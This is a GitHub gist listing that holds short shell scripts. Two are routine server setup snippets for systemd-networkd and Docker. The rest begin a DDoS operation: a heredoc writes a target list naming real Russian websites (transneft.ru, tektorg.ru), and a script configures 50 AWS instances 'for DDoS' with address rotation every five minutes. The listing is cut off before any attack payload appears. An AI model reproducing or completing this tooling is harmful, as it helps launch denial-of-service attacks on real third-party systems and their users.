Skip to content

Instantly share code, notes, and snippets.

View xpr0ger's full-sized avatar

Denys Mereshchenko xpr0ger

  • Kyiv, Ukraine
View GitHub Profile
#!/bin/bash
set -euo pipefail
dnf config-manager --set-enabled crb
dnf install epel-release -y
dnf install --refresh systemd-resolved systemd-networkd -y
systemctl enable systemd-networkd
#!/bin/bash
yum update -y
yum install docker -y
systemctl enable docker.service
systemctl start docker.service
# ============= TARGET WEBSITES ==============
cat <<EOF > targets.txt
transneft.ru
tektorg.ru
#!/bin/bash
# Amount of instances for DDoS
count=50
# Region
region="eu-west-2"
# Rotation interval.
rotationInterval=300 # in seconds. 5minutes by default
# Get VPC id
# Attention! If you have more than one VPC, replace it by proper one